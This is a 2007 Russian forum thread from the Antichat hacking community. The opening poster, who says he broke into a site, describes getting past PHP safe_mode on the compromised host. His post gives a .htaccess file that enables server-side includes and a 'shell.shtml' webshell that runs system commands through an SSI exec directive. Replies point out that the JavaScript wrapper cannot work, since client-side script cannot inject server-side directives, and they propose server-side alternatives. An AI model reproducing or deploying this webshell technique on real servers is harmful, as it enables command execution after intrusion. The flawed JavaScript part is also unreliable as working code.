Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
обход ограничений safe_mode... |

14.04.2007, 12:30
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме: 749524
Репутация:
715
|
|
обход ограничений safe_mode...
Это просто один из способов обойти ограничения на выполнение системных команд при safe_mode = on.
Целью не является сделать полный обзор по всем способам обхода ограничений safe_mode, а сделать упор на один.
Недавно у меня появилась такая проблема, взломал сайт (неважно как), получил на нем вебшелл. Права на запись были, но... safe_mode был как на зло включен. Тогда у меня появилась идея как его обойти. Точнее способ был известен и до меня, но я его предоставлю в более удобном виде.
Итак, есть вебшелл, права на запись в любую директорию сайта. Для начала смотрим phpinfo();. В поле Loaded Modules смотрим загружен ли модуль mod_include, если да, то все нормально. Создаем файл .htaccess следующего содержания:
Код:
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes
Далее пишем своеобразный "вебшелл" на JavaScript + SSI ( Server Side Includes), позволяющий обходить ограничения safe_mode и выполнять системные команды. Итак, создаем файл shell.shtml следующего содержания:
Код:
<html>
<body>
<script language="JavaScript">
<!--
function execute() {
var cmd = document.exec.cmd.value;
document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>');
}
//-->
</script>
<form name="exec">
<input type="text" name="cmd" size="20" value="">
<input type="submit" value="exec" onClick="execute()">
</form>
</body>
</html>
Все, наш скрипт готов. Для тех кто не понял, мы собираемся выполнять команды с помощью этой строчки:
Код:
<!--#exec cmd="uname -a;"-->
А JavaScript вставки и форма нужна для того чтобы не изменять каждый раз скрипт вручную, а делать все через веб интерфейс.
Вот собственно все что я хотел рассказать.
Полезные ссылки:
SSI
Обход Safe Mode
Поднимаем железный занавес
Последний раз редактировалось p-range; 14.04.2007 в 12:31..
Причина: опечатка в тексте
|
|
|

15.04.2007, 01:52
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
НЕ ВЕРЮ (c) станиславский
не верю что будет работать так как ssi должен выполнятся на стороне сервера а javascript выполняется на стороне клиента
если очень хочется неменяя кода скрипта выполнять разные команды можно сделать чтоб в кмд передавался какойнить HTTP_ACCEPT от клиента с командой, да и вобще ssi давно и много где освещалось так что незачет.
Последний раз редактировалось ShAnKaR; 15.04.2007 в 01:56..
|
|
|

15.04.2007, 02:00
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
ShAnKaR
Согласен, способ был бы актуален на jsp но... там нету safe_mode...
|
|
|

16.04.2007, 10:22
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме: 749524
Репутация:
715
|
|
ShAnKaR, не веришь, проверь.
ssi должен выполнятся на стороне сервера а javascript выполняется на стороне клиента
ты хоть понял для чего тут JavaScript нужен? выполняется только SSI, яваскрипт нужен лишь для автоматизации. тоесть для того чтобы не заливать каждый раз скрипт на сервер.
|
|
|

16.04.2007, 10:34
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме: 457850
Репутация:
174
|
|
Как сервер узнает, какую команду выполнять? Чисто физически браузер не передает серву участок кода с ssi...
Можно сделать у формы экшн на ифрейм, который ведет на скрипт, который в свою очередь прописывает код в .shtml-файл и перенаплавляет на него посылкой хеадера Location.
Последний раз редактировалось Koller; 16.04.2007 в 14:59..
|
|
|

16.04.2007, 10:47
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме: 749524
Репутация:
715
|
|
Можно сделать у формы экшн на ифрейм, который ведет на скрипт, который в свою очередь прописывает код в .shtml-файл и перенаплавляет на него посылкой хеадера Location.
ты имеешь ввиду php?
|
|
|

16.04.2007, 10:48
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме: 457850
Репутация:
174
|
|
да любой, хоть jsp
|
|
|

16.04.2007, 10:52
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме: 749524
Репутация:
715
|
|
ясно, будет время реализую
|
|
|

16.04.2007, 18:54
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
Сообщение от p-range
ShAnKaR, не веришь, проверь.
ты хоть понял для чего тут JavaScript нужен? выполняется только SSI, яваскрипт нужен лишь для автоматизации. тоесть для того чтобы не заливать каждый раз скрипт на сервер.
эээх не слушают меня ни когда  и не знают а спорят и спорят
Последний раз редактировалось ShAnKaR; 17.04.2007 в 19:08..
|
|
|

16.04.2007, 22:46
|
|
Познающий
Регистрация: 28.12.2006
Сообщений: 87
Провел на форуме: 429670
Репутация:
88
|
|
А это не пробовал никто?
http://www.securitylab.ru/vulnerability/source/271721.php
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|